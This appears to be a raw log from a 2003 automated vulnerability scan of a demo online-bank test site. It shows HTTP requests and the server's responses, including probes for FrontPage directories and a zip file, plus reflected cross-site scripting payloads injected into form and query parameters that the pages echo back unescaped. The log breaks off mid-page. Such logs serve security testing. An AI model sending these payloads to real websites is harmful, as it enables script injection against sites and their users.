GET /testing/p1.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/testing/pcomboindex.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:48 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 345 Content-Type: text/html Cache-control: private <font face="Arial" size=2> <p>Active Server Pages</font> <font face="Arial" size=2>error 'ASP 0126'</font> <p> <font face="Arial" size=2>Include file not found</font> <p> <font face="Arial" size=2>/testing/p1.asp</font><font face="Arial" size=2>, line 4</font> <p> <font face="Arial" size=2>The include file 'footer.inc' was not found. </font>
GET /_vti_txt/document.URL; HTTP/1.0 Referer: http://zero.webappsecurity.com:80/_vti_txt/ Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:44 GMT Content-Length: 4214 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html dir=ltr> <head> <style> a:link {font:8pt/11pt verdana; color:FF0000} a:visited {font:8pt/11pt verdana; color:#4e4e4e} </style> <META NAME="ROBOTS" CONTENT="NOINDEX"> <title>The page cannot be displayed</title> <META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252"> </head> <script> function Homepage(){ <!-- // in real bits, urls get returned to our script like this: // res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm //For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm" DocURL=document.URL; //this is where the http or https will be, as found by searching for :// but skipping the res:// protocolIndex=DocURL.indexOf("://",4); //this finds the ending slash for the domain server serverIndex=DocURL.indexOf("/",protocolIndex + 3); //for the href, we need a valid URL to the domain. We search for the # symbol to find the begining //of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker. //urlresult=DocURL.substring(protocolIndex - 4,serverIndex); BeginURL=DocURL.indexOf("#",1) + 1; urlresult=DocURL.substring(BeginURL,serverIndex); //for display, we need to skip after http://, and go to the next slash displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex); InsertElementAnchor(urlresult, displayresult); } function HtmlEncode(text) { return text.replace(/&/g, '&amp').replace(/'/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;'); } function TagAttrib(name, value) { return ' '+name+'="'+HtmlEncode(value)+'"'; } function PrintTag(tagName, needCloseTag, attrib, inner){ document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) ); if (needCloseTag) document.write( '</' + tagName +'>' ); } function URI(href) { IEVer = window.navigator.appVersion; IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 ); return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ? encodeURI(href) : escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';'); } function InsertElementAnchor(href, text) { PrintTag('A', true, TagAttrib('HREF', URI(href)), text); } //--> </script> <body bgcolor="FFFFFF"> <table width="410" cellpadding="3" cellspacing="5"> <tr> <td align="left" valign="middle" width="360"> <h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1> </td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana"> <hr color="#C0C0C0" noshade> <p>Please try the following:</p> <ul> <li>Open the <script> <!-- if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2"))) { Homepage(); } //--> </script> home page, and then look for links to the information you want.</li> <li>Click the <a href="javascript:location.reload()"> Refresh</a> button, or try again later.<br> </li> </ul> <h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br> Internet Information Services</h2> <hr color="#C0C0C0" noshade> <p>Technical Information (for support personnel)</p> <ul> <p> <li>Background:<br> This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p> <p> <li>More information:<br> <a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a> </li></p> </ul> </font></td> </tr> </table> </body> </html>
POST /testing/pcomboindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/testing/ Content-Length: 11 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect cboPage=pc3
HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:46 GMT X-Powered-By: ASP.NET Location: p3.asp Connection: Keep-Alive Content-Length: 121 Content-Type: text/html Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /testing/p3.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/testing/pcomboindex.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:41:48 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 345 Content-Type: text/html Cache-control: private <font face="Arial" size=2> <p>Active Server Pages</font> <font face="Arial" size=2>error 'ASP 0126'</font> <p> <font face="Arial" size=2>Include file not found</font> <p> <font face="Arial" size=2>/testing/p3.asp</font><font face="Arial" size=2>, line 5</font> <p> <font face="Arial" size=2>The include file 'footer.inc' was not found. </font>
POST /rootlogin.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com Content-Length: 98 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=%2A
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:37:49 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 63 Content-Type: text/html Cache-control: private <html> <body> An error has occurred </body> </html>
POST /pcomboindex.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/pindex.asp Content-Length: 40 Content-Type: application/x-www-form-urlencoded Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect cboPage=>"><script>alert('XSS')</script>
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:38:18 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 959 Content-Type: text/html Cache-control: private <html> <body> A user should never see this text<br> this page is a redirect only page. The page that the user selected was >"><script>alert('XSS')</script><br> Page was looking for a value in parameter called cboPage<br><br> <h2>What follows is a dump of the HTTP stuff</h2> <b>Form Variables Passed:</b><br>cboPage= >"><script>alert('XSS')</script><br> <b>QueryString variables passed:</b><br><pre>****** Head Data*** Client IP:199.72.29.34 Connection: Close Host: zero.webappsecurity.com Referer: http://zero.webappsecurity.com:80/pindex.asp User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect Content-Length: 40 Content-Type: application/x-www-form-urlencoded ****** End of Head Data*******</pre><br> </body> </html>
GET /banklogin.asp?err=>"><script>alert("XSS")</script> HTTP/1.0 Referer: http://zero.webappsecurity.com:80/login1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:37:05 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4947 Content-Type: text/html Cache-control: private Set-Cookie: state=; path=/ Set-Cookie: userid=; path=/ Set-Cookie: username=; path=/ Set-Cookie: sessionid=; path=/ <HTML> <HEAD> <TITLE></TITLE> </HEAD> <BODY> <TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black"> <TR> <TD STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3" HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150" HEIGHT="50"><BR><BR></TD> <TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47" VALIGN="TOP">&nbsp;</TD> <TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" VALIGN="TOP">&nbsp;</TD> </TR> <TR> <TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49"> <TABLE> <TR> <TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="217"> <FORM ACTION="login1.asp" METHOD="post"> <CENTER>>"><script>alert("XSS")</script><br>Username:<BR><INPUT TYPE="text" NAME="login" STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password" NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption" VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT TYPE="submit" STYLE="border: 1px solid black" VALUE=" Access Accounts "><BR></CENTER></FORM></TD> <TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217" ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266" BORDER="0"></TD> </TR> <TR> <TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241" VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to protect all transactions; however, this is not an invitation for people to attempt unauthorized access to the system. This is a private computing system which is restricted to authorized individuals. Actual or attempted unauthorized use of this computer system may result in criminal and/or civil prosecution. We reserve the right to view, monitor, and record activity on the system without notice or permission. Any information obtained by monitoring, reviewing, or recording is subject to review by law enforcement organizations in connection with the investigation or prosecution of possible criminal activity on the system. If you are not an authorized user of this system or do not consent to continued monitoring, exit the system at this time. </FONT></TD> </TR> </TABLE></TD> <TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5"> <tr> <td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p> <p><font size="2" face="Arial, Helvetica, sans-serif">If you would like a free trial version of WebInspect to test this website site.</font></p> <p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td> </tr> </table></TD> </TR> <TR> <TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20" BORDER="0"></TD> </TR> <TR> <TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT" BORDER="0" WIDTH="150" HEIGHT="20"></A></TD> </TR> <TR> <TD STYLE="border: 2px solid #2E7AA3" WIDTH="162" HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20" BORDER="0"></TD> </TR> <TR> <TD STYLE="border: 2px solid #2E7AA3" WIDTH="162" HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20" BORDER="0"></TD> </TR> <TR> <TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20" BORDER="0"></TD> </TR> <TR> <TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162" ALIGN="CENTER">&nbsp; <FORM ACTION="rootlogin.asp" METHOD="post"> <P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking Account with FreeBank:</FONT></P> <P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT TYPE="text" NAME="txtPassPhrase" STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1" FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName" STYLE="border: 1px solid black; spacing: 0"><BR> <INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user"> <INPUT TYPE="submit" STYLE="border: 1px solid black" VALUE="Register"></P></FORM></TD> </TR> </TABLE> </BODY> </HTML>
GET /join.asp?name=&email=>"'><img%20src="javascript:alert('XSS')">&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:35 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4013 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#c000ff colspan='2'>&nbsp;</td></tr> </center> </Table> </table> </body> </html>
GET /cgi.zip HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
Error Exporting Data
GET /_vti_pvt/ HTTP/1.0 Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:33 GMT Content-Length: 4214 Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html dir=ltr> <head> <style> a:link {font:8pt/11pt verdana; color:FF0000} a:visited {font:8pt/11pt verdana; color:#4e4e4e} </style> <META NAME="ROBOTS" CONTENT="NOINDEX"> <title>The page cannot be displayed</title> <META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252"> </head> <script> function Homepage(){ <!-- // in real bits, urls get returned to our script like this: // res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm //For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm" DocURL=document.URL; //this is where the http or https will be, as found by searching for :// but skipping the res:// protocolIndex=DocURL.indexOf("://",4); //this finds the ending slash for the domain server serverIndex=DocURL.indexOf("/",protocolIndex + 3); //for the href, we need a valid URL to the domain. We search for the # symbol to find the begining //of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker. //urlresult=DocURL.substring(protocolIndex - 4,serverIndex); BeginURL=DocURL.indexOf("#",1) + 1; urlresult=DocURL.substring(BeginURL,serverIndex); //for display, we need to skip after http://, and go to the next slash displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex); InsertElementAnchor(urlresult, displayresult); } function HtmlEncode(text) { return text.replace(/&/g, '&amp').replace(/'/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;'); } function TagAttrib(name, value) { return ' '+name+'="'+HtmlEncode(value)+'"'; } function PrintTag(tagName, needCloseTag, attrib, inner){ document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) ); if (needCloseTag) document.write( '</' + tagName +'>' ); } function URI(href) { IEVer = window.navigator.appVersion; IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 ); return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ? encodeURI(href) : escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';'); } function InsertElementAnchor(href, text) { PrintTag('A', true, TagAttrib('HREF', URI(href)), text); } //--> </script> <body bgcolor="FFFFFF"> <table width="410" cellpadding="3" cellspacing="5"> <tr> <td align="left" valign="middle" width="360"> <h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1> </td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td> </tr> <tr> <td width="400" colspan="2"> <font style="COLOR:000000; FONT: 8pt/11pt verdana"> <hr color="#C0C0C0" noshade> <p>Please try the following:</p> <ul> <li>Open the <script> <!-- if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2"))) { Homepage(); } //--> </script> home page, and then look for links to the information you want.</li> <li>Click the <a href="javascript:location.reload()"> Refresh</a> button, or try again later.<br> </li> </ul> <h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br> Internet Information Services</h2> <hr color="#C0C0C0" noshade> <p>Technical Information (for support personnel)</p> <ul> <p> <li>Background:<br> This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p> <p> <li>More information:<br> <a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a> </li></p> </ul> </font></td> </tr> </table> </body> </html>
GET /banklogin.asp HTTP/1.0 Referer: http://zero.webappsecurity.com:80/ Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:24:16 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 247 Content-Type: text/html Cache-control: private Set-Cookie: sessionid=; path=/ Set-Cookie: state=; path=/ Set-Cookie: username=; path=/ Set-Cookie: userid=; path=/ Please specify the name of Forté service and page.<br> <b>Usage:</b> http://web_server_name/cgi_directory_name/fortecgi?serviceName=Forté_service_name&pageName=request_page&other_info <br> <br> <b>Forte WebEnterprise Version WE.1.0.E.0</b>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=>"><script>alert('XSS')</script>&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0 Referer: http://zero.webappsecurity.com:80/join1.asp Connection: Close Host: zero.webappsecurity.com User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Pragma: no-cache Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 04 Dec 2003 16:55:28 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 4006 Content-Type: text/html Cache-control: private Set-Cookie: passes3=; path=/ Set-Cookie: passes2=; path=/ Set-Cookie: passes=; path=/ <html> <html> <head> <title>Join Us</title> <STYLE> <!-- td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial} A:link {text-decoration: none; color: #FFFFFF;} A:visited {text-decoration: none; color: #FEFCE0;} A:active {text-decoration: none; color: #FFFFFF;} A:hover {text-decoration: none; color:#CCFFFF;} --> </STYLE> </HEAD> <body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0"> <td valign="top" align="center"> <table width="100%" border="0" cellpadding="5" cellspacing="0" align="center"> <tr><td height="32" bgcolor="#c000ff"><center><b>J&nbsp;O&nbsp;I&nbsp;N</b></center></td></tr> <tr><td> <table cellpadding="0" cellspacing="2" border="0" width="400" align="center"> <tr><td>&nbsp;</td></tr> <tr><td>&nbsp;</td></tr> <FORM ACTION="join1.asp" METHOD="get" NAME="TheForm"> <center> <tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <TR><TD align="right" bgcolor=#003388><B>Name:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Surname:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>House Number:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Street:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Town/City:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Postcode:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Country:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Home Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR> <TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B>&nbsp;</TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR> <tr><td align="center" bgcolor=#003388 colspan='2'>&nbsp;</td></tr> <tr><td align="center" bgcolor=#003388 